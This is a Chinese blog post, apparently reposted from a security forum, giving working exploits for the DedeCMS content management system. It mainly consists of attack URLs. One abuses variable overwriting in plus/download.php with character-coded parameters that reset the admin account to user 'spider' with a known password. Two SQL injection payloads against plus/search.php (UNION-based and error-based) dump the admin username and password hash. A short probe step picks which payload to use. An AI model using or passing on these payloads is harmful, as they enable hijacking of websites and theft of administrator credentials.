覆盖变量dedecms最新漏洞...执行下面代码,自动添加帐号spider 密码admin

作者mazerain 文章分类 分类:dedecms(织梦) 文章评论 0条评论 阅读次数 已被围观 2157
http://xxxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

提交 mumaasp.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a

看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
QQ截图20130119225931.jpg

<img id="aimg_8657" src="http://img.90sec.org/forumid_10/1301192303ea6ea786298d3fbf.jpg" alt="QQ截图20130119225931.jpg" width="378" />

看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
QQ截图20130119225757.jpg

<img id="aimg_8658" src="http://img.90sec.org/forumid_10/130119230336d42cf361c166f0.jpg" alt="QQ截图20130119225757.jpg" width="600" />

如果正常显示证明漏洞不存在了。

版权所有:《晋城生活服务》 => 《覆盖变量dedecms最新漏洞...执行下面代码,自动添加帐号spider 密码admin
本文地址:http://blog.0356sh.com/dede_bug.html
除非注明,文章均为 《晋城生活服务》 原创,欢迎转载!转载请注明本文地址,谢谢。

et_highlighter

发表评论: